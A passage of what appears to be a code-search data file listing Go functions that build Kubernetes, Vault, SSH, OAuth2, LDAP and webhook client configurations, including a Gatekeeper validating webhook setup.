metav1.LabelSelectorOpDoesNotExist,\n\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\tKey: resources.GatekeeperExemptNamespaceLabel,\n\t\t\t\t\t\t\t\tOperator: metav1.LabelSelectorOpDoesNotExist,\n\t\t\t\t\t\t\t},\n\t\t\t\t\t\t},\n\t\t\t\t\t},\n\t\t\t\t\tObjectSelector: &metav1.LabelSelector{},\n\t\t\t\t\tClientConfig: admissionregistrationv1.WebhookClientConfig{\n\t\t\t\t\t\tCABundle: caBundle,\n\t\t\t\t\t\tService: &admissionregistrationv1.ServiceReference{\n\t\t\t\t\t\t\tName: resources.GatekeeperWebhookServiceName,\n\t\t\t\t\t\t\tNamespace: resources.GatekeeperNamespace,\n\t\t\t\t\t\t\tPath: pointer.StringPtr(\"/v1/admit\"),\n\t\t\t\t\t\t\tPort: pointer.Int32Ptr(443),\n\t\t\t\t\t\t},\n\t\t\t\t\t},\n\t\t\t\t\tRules: []admissionregistrationv1.RuleWithOperations{\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\tOperations: []admissionregistrationv1.OperationType{\n\t\t\t\t\t\t\t\tadmissionregistrationv1.Create,\n\t\t\t\t\t\t\t\tadmissionregistrationv1.Update,\n\t\t\t\t\t\t\t\tadmissionregistrationv1.Delete,\n\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\tRule: admissionregistrationv1.Rule{\n\t\t\t\t\t\t\t\tAPIGroups: []string{\"*\"},\n\t\t\t\t\t\t\t\tAPIVersions: []string{\"*\"},\n\t\t\t\t\t\t\t\tResources: []string{\"*\"},\n\t\t\t\t\t\t\t\tScope: &allScopes,\n\t\t\t\t\t\t\t},\n\t\t\t\t\t\t},\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tName: \"check-ignore-label.gatekeeper.sh\",\n\t\t\t\t\tAdmissionReviewVersions: []string{admissionregistrationv1.SchemeGroupVersion.Version, admissionregistrationv1beta1.SchemeGroupVersion.Version},\n\t\t\t\t\tFailurePolicy: &failurePolicyIgnore,\n\t\t\t\t\tSideEffects: &sideEffectsNone,\n\t\t\t\t\tTimeoutSeconds: pointer.Int32Ptr(int32(timeout)),\n\t\t\t\t\tMatchPolicy: &matchPolicyExact,\n\t\t\t\t\tNamespaceSelector: &metav1.LabelSelector{\n\t\t\t\t\t\tMatchExpressions: []metav1.LabelSelectorRequirement{\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\tKey: \"control-plane\",\n\t\t\t\t\t\t\t\tOperator: metav1.LabelSelectorOpDoesNotExist,\n\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\tKey: resources.GatekeeperExemptNamespaceLabel,\n\t\t\t\t\t\t\t\tOperator: metav1.LabelSelectorOpDoesNotExist,\n\t\t\t\t\t\t\t},\n\t\t\t\t\t\t},\n\t\t\t\t\t},\n\t\t\t\t\tObjectSelector: &metav1.LabelSelector{},\n\t\t\t\t\tClientConfig: admissionregistrationv1.WebhookClientConfig{\n\t\t\t\t\t\tCABundle: caBundle,\n\t\t\t\t\t\tService: &admissionregistrationv1.ServiceReference{\n\t\t\t\t\t\t\tName: resources.GatekeeperWebhookServiceName,\n\t\t\t\t\t\t\tNamespace: resources.GatekeeperNamespace,\n\t\t\t\t\t\t\tPath: pointer.StringPtr(\"/v1/admitlabel\"),\n\t\t\t\t\t\t\tPort: pointer.Int32Ptr(443),\n\t\t\t\t\t\t},\n\t\t\t\t\t},\n\t\t\t\t\tRules: []admissionregistrationv1.RuleWithOperations{\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\tOperations: []admissionregistrationv1.OperationType{\n\t\t\t\t\t\t\t\tadmissionregistrationv1.Create,\n\t\t\t\t\t\t\t\tadmissionregistrationv1.Update,\n\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\tRule: admissionregistrationv1.Rule{\n\t\t\t\t\t\t\t\tAPIGroups: []string{\"\"},\n\t\t\t\t\t\t\t\tAPIVersions: []string{\"*\"},\n\t\t\t\t\t\t\t\tResources: []string{\"namespaces\"},\n\t\t\t\t\t\t\t\tScope: &allScopes,\n\t\t\t\t\t\t\t},\n\t\t\t\t\t\t},\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t}\n\n\t\t\treturn validatingWebhookConfigurationWebhookConfiguration, nil\n\t\t}\n\t}\n}", "func GetClientConfig(kubeconfig string) (*rest.Config, error) {\n\tif kubeconfig != \"\" {\n\t\treturn clientcmd.BuildConfigFromFlags(\"\", kubeconfig)\n\t}\n\treturn rest.InClusterConfig()\n}", "func GetClientConfig(kubeconfig string) (*rest.Config, error) {\n\tif kubeconfig != \"\" {\n\t\treturn clientcmd.BuildConfigFromFlags(\"\", kubeconfig)\n\t}\n\treturn rest.InClusterConfig()\n}", "func (c WebhooksConfig) NewWebhooks(ctx context.Context, server io.Server) (web.Webhooks, error) {\n\tvar target web.Sink\n\tswitch c.Target {\n\tcase \"\":\n\t\treturn nil, nil\n\tcase \"direct\":\n\t\ttarget = &web.HTTPClientSink{\n\t\t\tClient: &http.Client{\n\t\t\t\tTimeout: c.Timeout,\n\t\t\t},\n\t\t}\n\tdefault:\n\t\treturn nil, errWebhooksTarget.WithAttributes(\"target\", c.Target)\n\t}\n\tif c.Registry == nil {\n\t\treturn nil, errWebhooksRegistry.New()\n\t}\n\tif c.QueueSize > 0 || c.Workers > 0 {\n\t\ttarget = &web.QueuedSink{\n\t\t\tTarget: target,\n\t\t\tQueue: make(chan *http.Request, c.QueueSize),\n\t\t\tWorkers: c.Workers,\n\t\t}\n\t}\n\tif controllable, ok := target.(web.ControllableSink); ok {\n\t\tgo func() {\n\t\t\tif err := controllable.Run(ctx); err != nil && !errors.IsCanceled(err) {\n\t\t\t\tlog.FromContext(ctx).WithError(err).Error(\"Webhooks target sink failed\")\n\t\t\t}\n\t\t}()\n\t}\n\treturn web.NewWebhooks(ctx, server, c.Registry, target, c.Downlinks), nil\n}", "func NewClientWithConfig(config *Config) *Client {\n\tvar tlsConfig *tls.Config\n\tif len(config.CertificateP12) > 0 {\n\t\t// 密码为商户ID\n\t\t// 这里忽略错误, 因为没有证书只会影响高级接口, 高级接口调用时输出相应的日志即可\n\t\tvar err error\n\t\ttlsConfig, err = getTLSConfig(config.CertificateP12, config.MerchantID, config.RootCAPem)\n\t\tif err != nil {\n\t\t\tlog.Warningf(\"[%s:%s] Failed to init tls config, secure APIs with certificate validation would be unavailable, error: %+v\",\n\t\t\t\tconfig.AppID, config.AppName, err)\n\t\t}\n\t} else {\n\t\tlog.Warningf(\"[%s:%s] certificate was not configured, secure APIs with certificate validation would be unavailable\",\n\t\t\tconfig.AppID, config.AppName)\n\t}\n\n\treturn &Client{\n\t\tconfig: config,\n\t\ttlsConfig: tlsConfig,\n\t}\n}", "func NewConfigClientFactory(name string, config *rest.Config) *ConfigClientFactory {\n\treturn &ConfigClientFactory{name, config}\n}", "func (b *AdapterBase) ClientConfig() (*rest.Config, error) {\n\tif b.clientConfig == nil {\n\t\tvar clientConfig *rest.Config\n\t\tvar err error\n\t\tif len(b.RemoteKubeConfigFile) > 0 {\n\t\t\tloadingRules := &clientcmd.ClientConfigLoadingRules{ExplicitPath: b.RemoteKubeConfigFile}\n\t\t\tloader := clientcmd.NewNonInteractiveDeferredLoadingClientConfig(loadingRules, &clientcmd.ConfigOverrides{})\n\n\t\t\tclientConfig, err = loader.ClientConfig()\n\t\t} else {\n\t\t\tclientConfig, err = rest.InClusterConfig()\n\t\t}\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"unable to construct lister client config to initialize provider: %v\", err)\n\t\t}\n\t\tb.clientConfig = clientConfig\n\t}\n\treturn b.clientConfig, nil\n}", "func NewHTTPClientFromConfig(cfg *config.Config) (*HTTPClient, error) {\n\t// get clients\n\tordererClients, err := getOrdererHTTPClients(cfg)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tpeerClients, err := getPeerHTTPClients(cfg)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn &HTTPClient{\n\t\tordererHTTPClients: ordererClients,\n\t\tpeerHTTPClients: peerClients,\n\t\tprivKey: cfg.KeyStore.Privs[0],\n\t}, nil\n}", "func (c *clientSet) ValidatingWebhookConfigurations() ValidatingWebhookConfigurationClient {\n\treturn NewValidatingWebhookConfigurationClient(c.client)\n}", "func createOpenAPIBuilderConfig() *common.Config {\n\treturn &common.Config{\n\t\tProtocolList: []string{\"https\"},\n\t\tIgnorePrefixes: []string{\"/swaggerapi\"},\n\t\tInfo: &spec.Info{\n\t\t\tInfoProps: spec.InfoProps{\n\t\t\t\tTitle: \"Argo-Events\",\n\t\t\t\tVersion: \"v0.6\",\n\t\t\t},\n\t\t},\n\t}\n}", "func (c *Client) initClientConfig() error {\n\tif c.clientConfig != nil {\n\t\t// ssh.CLientConfig has been provided for us\n\t\treturn nil\n\t}\n\thostKeyCallback, err := knownhosts.New(fmt.Sprintf(\"%s/.ssh/known_hosts\", os.Getenv(\"HOME\")))\n\tif err != nil {\n\t\treturn err\n\t}\n\tsshAuthMethods := []ssh.AuthMethod{AgentAuth(), PublicKeyAuth(), PasswordAuth()}\n\tif c.agent != nil {\n\t\tsshAuthMethods = append(sshAuthMethods, ssh.PublicKeysCallback(c.agent.Signers))\n\t}\n\tc.clientConfig = &ssh.ClientConfig{\n\t\tUser: c.user,\n\t\tAuth: sshAuthMethods,\n\t\tHostKeyCallback: hostKeyCallback,\n\t\tTimeout: time.Duration(int64(time.Second * 20)),\n\t}\n\treturn nil\n}", "func LoadApiClientConfig(path string, context string) (*restclient.Config, error) {\n\toverrides := clientcmd.ConfigOverrides{}\n\tif context != \"\" {\n\t\toverrides.CurrentContext = context\n\t}\n\tconfig := clientcmd.NewNonInteractiveDeferredLoadingClientConfig(\n\t\t&clientcmd.ClientConfigLoadingRules{ExplicitPath: path},\n\t\t&overrides)\n\treturn config.ClientConfig()\n}", "func (client *WebhooksClient) getCallbackConfigCreateRequest(ctx context.Context, resourceGroupName string, registryName string, webhookName string, options *WebhooksClientGetCallbackConfigOptions) (*policy.Request, error) {\n\turlPath := \"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerRegistry/registries/{registryName}/webhooks/{webhookName}/getCallbackConfig\"\n\tif client.subscriptionID == \"\" {\n\t\treturn nil, errors.New(\"parameter client.subscriptionID cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{subscriptionId}\", url.PathEscape(client.subscriptionID))\n\tif resourceGroupName == \"\" {\n\t\treturn nil, errors.New(\"parameter resourceGroupName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{resourceGroupName}\", url.PathEscape(resourceGroupName))\n\tif registryName == \"\" {\n\t\treturn nil, errors.New(\"parameter registryName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{registryName}\", url.PathEscape(registryName))\n\tif webhookName == \"\" {\n\t\treturn nil, errors.New(\"parameter webhookName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{webhookName}\", url.PathEscape(webhookName))\n\treq, err := runtime.NewRequest(ctx, http.MethodPost, runtime.JoinPaths(client.internal.Endpoint(), urlPath))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treqQP := req.Raw().URL.Query()\n\treqQP.Set(\"api-version\", \"2019-05-01\")\n\treq.Raw().URL.RawQuery = reqQP.Encode()\n\treq.Raw().Header[\"Accept\"] = []string{\"application/json\"}\n\treturn req, nil\n}", "func (client *Client) UpdateHookConfigurationWithChan(request *UpdateHookConfigurationRequest) (<-chan *UpdateHookConfigurationResponse, <-chan error) {\n\tresponseChan := make(chan *UpdateHookConfigurationResponse, 1)\n\terrChan := make(chan error, 1)\n\terr := client.AddAsyncTask(func() {\n\t\tdefer close(responseChan)\n\t\tdefer close(errChan)\n\t\tresponse, err := client.UpdateHookConfiguration(request)\n\t\tif err != nil {\n\t\t\terrChan <- err\n\t\t} else {\n\t\t\tresponseChan <- response\n\t\t}\n\t})\n\tif err != nil {\n\t\terrChan <- err\n\t\tclose(responseChan)\n\t\tclose(errChan)\n\t}\n\treturn responseChan, errChan\n}", "func NewWebhook(client kubernetes.Interface, resources *WebhookResources, controllerNamespace string, noInitContainer bool) (*Webhook, error) {\n\tvar (\n\t\tscheme = runtime.NewScheme()\n\t\tcodecs = serializer.NewCodecFactory(scheme)\n\t)\n\n\treturn &Webhook{\n\t\tdeserializer: codecs.UniversalDeserializer(),\n\t\tcontrollerNamespace: controllerNamespace,\n\t\tresources: resources,\n\t\tnoInitContainer: noInitContainer,\n\t}, nil\n}", "func NewClientWithConfig(config *vaultapi.Config, vaultCfg *Config, gcpCfg *GCPBackendConfig) (*Client, error) {\n\tvar clientToken string\n\tvar err error\n\trawClient, err := vaultapi.NewClient(config)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tlogical := rawClient.Logical()\n\tclient := &Client{Client: rawClient, Logical: logical}\n\n\tswitch vaultCfg.Backend {\n\tcase \"gcp\":\n\t\tclientToken, err = GCPBackendLogin(client, gcpCfg, vaultCfg)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\tdefault:\n\t\tjwt, err := GetServiceAccountToken(vaultCfg.TokenPath)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tclientToken, err = KubernetesBackendLogin(client, vaultCfg.Role, jwt)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\n\tif err == nil {\n\t\trawClient.SetToken(string(clientToken))\n\t} else {\n\t\treturn nil, err\n\t}\n\treturn client, nil\n}", "func loadClientConfig() *client.Config {\n\tcfg := &client.Config{\n\t\tHost: viper.GetString(\"host\"),\n\t\tPort: viper.GetInt(\"port\"),\n\t\tSSL: viper.GetBool(\"insecure\"),\n\t\tInsecure: viper.GetBool(\"insecure\"),\n\t\tBindDN: viper.GetString(\"bind\"),\n\t\tBindPassword: viper.GetString(\"password\"),\n\t}\n\tlog.WithFields(log.Fields{\n\t\t\"host\": cfg.Host,\n\t\t\"port\": cfg.Port,\n\t\t\"bind\": cfg.BindDN,\n\t}).Debug(\"LDAP client config\")\n\treturn cfg\n}", "func (o *ClientConfig) NewClient(options ...ClientOption) (Client, error) {\n\n\t// Run provided ClientOption configuration options.\n\tfor _, opt := range options {\n\t\terr := opt(o)\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"failed applying functional option: %w\", err)\n\t\t}\n\t}\n\n\t// Check mandatory option is provided.\n\tif o.githubUserClient == nil {\n\t\treturn nil, fmt.Errorf(\"github client not provided\")\n\t}\n\n\ttokenGenerator := secret.GetTokenGenerator(o.tokenPath)\n\n\tgitFactory, err := o.GitClient(o.githubUserClient, tokenGenerator, secret.Censor, false)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tgitClient := &client{}\n\t// Initialize map to enable writing to it in methods.\n\tgitClient.clonedRepos = make(map[string]string)\n\tgitClient.ClientFactory = gitFactory\n\treturn gitClient, err\n}", "func GetValidatingWebhookConfiguration(ctx *pulumi.Context,\n\tname string, id pulumi.IDInput, state *ValidatingWebhookConfigurationState, opts ...pulumi.ResourceOption) (*ValidatingWebhookConfiguration, error) {\n\tvar resource ValidatingWebhookConfiguration\n\terr := ctx.ReadResource(\"kubernetes:admissionregistration.k8s.io/v1:ValidatingWebhookConfiguration\", name, id, state, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func ExampleClientConfig() {\n\t// In real code this MUST be replaced by the factory from the actual implementation.\n\tvar ecFactory ecinterface.Factory\n\n\tvar cfg Config\n\tif err := baseplate.ParseConfigYAML(&cfg); err != nil {\n\t\tpanic(err)\n\t}\n\n\tctx, bp, err := baseplate.New(context.Background(), baseplate.NewArgs{\n\t\tConfig: cfg,\n\t\tEdgeContextFactory: ecFactory,\n\t})\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tdefer bp.Close()\n\n\tclient := redisbp.NewMonitoredClient(\"redis\", redisbp.OptionsMust(cfg.Redis.Options()))\n\tclient.Ping(ctx)\n}", "func (c *ClusterProvider) NewClientConfig() (*ClientConfig, error) {\n\tclusterName := fmt.Sprintf(\"%s.%s.eksctl.io\", c.cfg.ClusterName, c.cfg.Region)\n\tcontextName := fmt.Sprintf(\"%s@%s\", c.getUsername(), clusterName)\n\n\tclientConfig := &ClientConfig{\n\t\tCluster: c.cfg,\n\t\tClient: &clientcmdapi.Config{\n\t\t\tClusters: map[string]*clientcmdapi.Cluster{\n\t\t\t\tclusterName: {\n\t\t\t\t\tServer: c.cfg.MasterEndpoint,\n\t\t\t\t\tCertificateAuthorityData: c.cfg.CertificateAuthorityData,\n\t\t\t\t},\n\t\t\t},\n\t\t\tContexts: map[string]*clientcmdapi.Context{\n\t\t\t\tcontextName: {\n\t\t\t\t\tCluster: clusterName,\n\t\t\t\t\tAuthInfo: contextName,\n\t\t\t\t},\n\t\t\t},\n\t\t\tAuthInfos: map[string]*clientcmdapi.AuthInfo{\n\t\t\t\tcontextName: &clientcmdapi.AuthInfo{},\n\t\t\t},\n\t\t\tCurrentContext: contextName,\n\t\t},\n\t\tClusterName: clusterName,\n\t\tContextName: contextName,\n\t\troleARN: c.svc.arn,\n\t\tsts: c.svc.sts,\n\t}\n\n\treturn clientConfig, nil\n}", "func (s *AsyncInferenceConfig) SetClientConfig(v *AsyncInferenceClientConfig) *AsyncInferenceConfig {\n\ts.ClientConfig = v\n\treturn s\n}", "func (c *TLSConfig) BuildModuleClientConfig(host string) *tls.Config {\n\tif c == nil {\n\t\t// use default TLS settings, if config is empty.\n\t\treturn &tls.Config{\n\t\t\tServerName: host,\n\t\t\tInsecureSkipVerify: true,\n\t\t\tVerifyConnection: makeVerifyConnection(&TLSConfig{\n\t\t\t\tVerification: VerifyFull,\n\t\t\t}),\n\t\t}\n\t}\n\n\tconfig := c.ToConfig()\n\tconfig.ServerName = host\n\treturn config\n}", "func NewClient(kubeConfig string) (client *Client, err error) {\n\tconfig, err := GetClientConfig(kubeConfig)\n\tif err != nil {\n\t\treturn nil, trace.Wrap(err)\n\t}\n\n\tclientset, err := kubernetes.NewForConfig(config)\n\tif err != nil {\n\t\treturn nil, trace.Wrap(err)\n\t}\n\n\textClientset, err := apiextensionsclientset.NewForConfig(config)\n\tif err != nil {\n\t\treturn nil, trace.Wrap(err)\n\t}\n\n\treturn &Client{\n\t\tClient: clientset,\n\t\tExtClient: extClientset,\n\t}, nil\n}", "func NewForConfig(c *rest.Config) (*ServicebrokerV1alpha1Client, error) {\n\tconfig := *c\n\tif err := setConfigDefaults(&config); err != nil {\n\t\treturn nil, err\n\t}\n\tclient, err := rest.RESTClientFor(&config)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &ServicebrokerV1alpha1Client{client}, nil\n}", "func NewClient(config *Config) (*Client, error) {\n\tdefConfig := DefaultConfig()\n\n\tif len(config.Address) == 0 {\n\t\tconfig.Address = defConfig.Address\n\t}\n\n\tif len(config.Scheme) == 0 {\n\t\tconfig.Scheme = defConfig.Scheme\n\t}\n\n\tif config.HTTPClient == nil {\n\t\tconfig.HTTPClient = defConfig.HTTPClient\n\t}\n\n\tclient := &Client{\n\t\tConfig: *config,\n\t}\n\treturn client, nil\n}", "func NewClientFromConfiguration(config *Configuration) (*Client, error) {\n\terr := config.Validate()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tclient, err := NewClient(config)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn client, nil\n}", "func EventListenerConfig(generatedResourceName string) EventListenerStatusOp {\n\treturn func(e *v1alpha1.EventListenerStatus) {\n\t\te.Configuration.GeneratedResourceName = generatedResourceName\n\t}\n}", "func EventListenerConfig(generatedResourceName string) EventListenerStatusOp {\n\treturn func(e *v1alpha1.EventListenerStatus) {\n\t\te.Configuration.GeneratedResourceName = generatedResourceName\n\t}\n}", "func (whc *WebhookConfigController) rebuildWebhookConfig() error {\n\twebhookConfig, err := rebuildWebhookConfigHelper(\n\t\twhc.webhookParameters.CACertFile,\n\t\twhc.webhookParameters.WebhookConfigFile,\n\t\twhc.webhookParameters.WebhookName,\n\t\twhc.ownerRefs)\n\tif err != nil {\n\t\treportValidationConfigLoadError(err)\n\t\tscope.Errorf(\"validatingwebhookconfiguration (re)load failed: %v\", err)\n\t\treturn err\n\t}\n\twhc.webhookConfiguration = webhookConfig\n\n\t// pretty-print the validatingwebhookconfiguration as YAML\n\tvar webhookYAML string\n\tif b, err := yaml.Marshal(whc.webhookConfiguration); err == nil {\n\t\twebhookYAML = string(b)\n\t}\n\tscope.Infof(\"%v validatingwebhookconfiguration (re)loaded: \\n%v\",\n\t\twhc.webhookConfiguration.Name, webhookYAML)\n\n\treportValidationConfigLoad()\n\n\treturn nil\n}", "func NewClient(conf *ClientConfig, opt ...grpc.DialOption) *Client {\n\tc := new(Client)\n\tif err := c.SetConfig(conf); err != nil {\n\t\tpanic(err)\n\t}\n\tc.UseOpt(opt...)\n\tc.Use(c.recovery(), c.handle())\n\treturn c\n}", "func (target *WebhookTarget) initWebhook() error {\n\targs := target.args\n\ttransport := target.transport\n\n\tif args.ClientCert != \"\" && args.ClientKey != \"\" {\n\t\tmanager, err := certs.NewManager(context.Background(), args.ClientCert, args.ClientKey, tls.LoadX509KeyPair)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tmanager.ReloadOnSignal(syscall.SIGHUP) // allow reloads upon SIGHUP\n\t\ttransport.TLSClientConfig.GetClientCertificate = manager.GetClientCertificate\n\t}\n\ttarget.httpClient = &http.Client{Transport: transport}\n\n\tyes, err := target.isActive()\n\tif err != nil {\n\t\treturn err\n\t}\n\tif !yes {\n\t\treturn errNotConnected\n\t}\n\n\treturn nil\n}", "func NewClientWrapper(config *api.Config, httpClient *http.Client) (IClient, error) {\n\tvar err error\n\tconfig.HttpClient = httpClient\n\tcfg := &ClientWrapper{}\n\tcfg.Client, err = api.NewClient(config)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"unable to create new Consul client: %s\", err)\n\t}\n\treturn cfg, nil\n}", "func NewClient(config *config.Configuration, messageHandler exchange.MessageHandler) (*Client, error) {\n\n\tclientLogger := logger.NewLogger()\n\n\twebsocketBase, err := websocket.New(Url, clientLogger)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tclient := &Client{\n\t\tconfig: config,\n\t\tws: websocketBase,\n\t\tlogger: clientLogger,\n\t\tsubscriptions: map[string][]string{},\n\t}\n\n\tif config != nil {\n\t\tif config.GetAuth() != nil {\n\t\t\twebsocketBase.OnConnected = client.Authenticate\n\t\t}\n\t}\n\n\twebsocketBase.OnMessage = websocket.OnMessageHandler(messageHandler)\n\n\twebsocketBase.SetKeepAliveTimeout(30 * time.Second)\n\n\treturn client, nil\n}", "func NewWebhookAPI(webhookChan chan dockworker.Job) WebhookAPI {\n\treturn WebhookAPI{\n\t\twebhookChan: webhookChan,\n\t}\n}", "func NewClient(cfg *Config) (*Client, error) {\n\t// Pass the transport with TLS settings to the oauth2 library in the context\n\tif cfg.TLSConfig == nil {\n\t\tcfg.TLSConfig = defaultTLSConfig\n\t}\n\tif cfg.HTTPTimeout == 0 {\n\t\tcfg.HTTPTimeout = defaultHTTPTimeout\n\t}\n\ttransport := http.DefaultTransport.(*http.Transport).Clone()\n\ttransport.TLSClientConfig = cfg.TLSConfig\n\tctxClient := &http.Client{Transport: transport}\n\tctx := context.TODO()\n\tctx = context.WithValue(ctx, oauth2.HTTPClient, ctxClient)\n\n\t// Create the oauth2 Client\n\tconfig := &clientcredentials.Config{\n\t\tClientID: cfg.ClientID,\n\t\tClientSecret: cfg.ClientSecret,\n\t\tTokenURL: cfg.TokenURL,\n\t}\n\thttpClient := config.Client(ctx)\n\tif httpClient == nil {\n\t\treturn nil, fmt.Errorf(\"Error creating Oauth2 http client for %s\", config.TokenURL)\n\t}\n\thttpClient.Timeout = cfg.HTTPTimeout\n\tclient := &Client{\n\t\tHTTPClient: httpClient,\n\t\tRetryWaitMin: defaultRetryWaitMin,\n\t\tRetryWaitMax: defaultRetryWaitMax,\n\t\tRetryMax: defaultRetryMax,\n\t\tCheckRetry: DefaultRetryPolicy,\n\t\tBackoff: DefaultBackoff,\n\t}\n\tlog.Infof(\"oauth2/clientcredential client created: RetryWaitMin=%v, RetryWaitMax=%v, RetryMax=%d\\n\",\n\t\tclient.RetryWaitMin, client.RetryWaitMax, client.RetryMax)\n\n\treturn client, nil\n}", "func ValidatingWebhookConfigurationObjectWrapper(create ValidatingWebhookConfigurationCreator) ObjectCreator {\n\treturn func(existing runtime.Object) (runtime.Object, error) {\n\t\tif existing != nil {\n\t\t\treturn create(existing.(*admissionregistrationv1beta1.ValidatingWebhookConfiguration))\n\t\t}\n\t\treturn create(&admissionregistrationv1beta1.ValidatingWebhookConfiguration{})\n\t}\n}", "func (client *Client) UpdateHookConfigurationWithCallback(request *UpdateHookConfigurationRequest, callback func(response *UpdateHookConfigurationResponse, err error)) <-chan int {\n\tresult := make(chan int, 1)\n\terr := client.AddAsyncTask(func() {\n\t\tvar response *UpdateHookConfigurationResponse\n\t\tvar err error\n\t\tdefer close(result)\n\t\tresponse, err = client.UpdateHookConfiguration(request)\n\t\tcallback(response, err)\n\t\tresult <- 1\n\t})\n\tif err != nil {\n\t\tdefer close(result)\n\t\tcallback(nil, err)\n\t\tresult <- 0\n\t}\n\treturn result\n}", "func (c *Client) ClientConfig(conf ssh.ClientConfig) *Client {\n\tc.clientConfig = &conf\n\treturn c\n}", "func (p *EtcdClientV3) GetConfig() *ClientConfig {\n\treturn &ClientConfig{\n\t\tendpoints: p.endpoints,\n\t\tTLSConfig: p.tlsConfig,\n\t}\n}", "func (o *DeleteV1WebhooksWebhookIDParams) WithHTTPClient(client *http.Client) *DeleteV1WebhooksWebhookIDParams {\n\to.SetHTTPClient(client)\n\treturn o\n}", "func NewClient(cfg *Config, args ...interface{}) (endpoint.Connector, error) {\n\treturn cfg.newClient(args)\n}", "func NewConfigClient() api.ConfigClient {\n\treturn &configClientImpl{}\n}", "func NewHTTPClientWithConfig(formats strfmt.Registry, cfg *TransportConfig) *JusticeLobbyService {\n\t// ensure nullable parameters have default\n\tif cfg == nil {\n\t\tcfg = DefaultTransportConfig()\n\t}\n\n\t// create transport and client\n\ttransport := httptransport.New(cfg.Host, cfg.BasePath, cfg.Schemes)\n\n\t// custom transport runtime\n\tutils.CustomTransportRuntime(transport)\n\n\treturn New(transport, transport, formats)\n}", "func NewClientWith(config *config.Configuration, tickerHandler exchange.TickerHandler,\n\ttradesHandler exchange.TradesHandler, orderBookSnapshotHandler exchange.OrderBookSnapshotHandler,\n\torderBookDeltaHandler exchange.OrderBookDeltaHandler) (*Client, error) {\n\n\tclientLogger := logger.NewLogger()\n\n\twebsocketBase, err := websocket.New(Url, clientLogger)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tclient := &Client{\n\t\tconfig: config,\n\t\tws: websocketBase,\n\t\tlogger: clientLogger,\n\t\tsubscriptions: map[string][]string{},\n\t\tOnTicker: tickerHandler,\n\t\tOnTrades: tradesHandler,\n\t\tOnOrderBookSnapshot: orderBookSnapshotHandler,\n\t\tOnOrderBookDelta: orderBookDeltaHandler,\n\t}\n\n\tif config != nil {\n\t\tif config.GetAuth() != nil {\n\t\t\twebsocketBase.OnConnected = client.Authenticate\n\t\t}\n\t}\n\n\twebsocketBase.OnMessage = client.OnMessage\n\n\twebsocketBase.SetKeepAliveTimeout(30 * time.Second)\n\n\treturn client, nil\n}", "func buildConfig(log logrus.FieldLogger, masterURL, kubeConfig string) (*rest.Config, error) {\n\tif os.Getenv(\"KUBERNETES_SERVICE_HOST\") != \"\" && os.Getenv(\"KUBERNETES_SERVICE_PORT\") != \"\" {\n\t\t// If these env vars are set, we can build an in-cluster config.\n\t\tlog.Debug(\"Creating in-cluster client\")\n\t\treturn rest.InClusterConfig()\n\t}\n\n\tif masterURL != \"\" || kubeConfig != \"\" {\n\t\tlog.Debug(\"Creating cluster-external client from provided masterURL or kubeconfig\")\n\t\treturn clientcmd.BuildConfigFromFlags(masterURL, kubeConfig)\n\t}\n\n\treturn nil, fmt.Errorf(\"could not create client: missing masterURL or kubeConfig\")\n}", "func NewClient(config *api.APIConfig, tokenSource oauth2.TokenSource, sourcerepoService *sourcerepo.Service) Client {\n\tif config == nil || config.Integrations == nil || config.Integrations.CloudSource == nil || !config.Integrations.CloudSource.Enable {\n\t\treturn &client{\n\t\t\tenabled: false,\n\t\t}\n\t}\n\n\treturn &client{\n\t\tenabled: true,\n\t\tconfig: config,\n\t\tservice: sourcerepoService,\n\t\ttokenSource: tokenSource,\n\t}\n}", "func NewWebhookSender(config Config) Sender {\n\treturn webhookSender{config}\n}", "func (c *Client) AddWebhook(w *Webhook) error {\n\treturn c.AddWebHookContext(context.TODO(), w)\n}", "func NewAlertConfigClient(aviSession *session.AviSession) *AlertConfigClient {\n\treturn &AlertConfigClient{aviSession: aviSession}\n}" ]
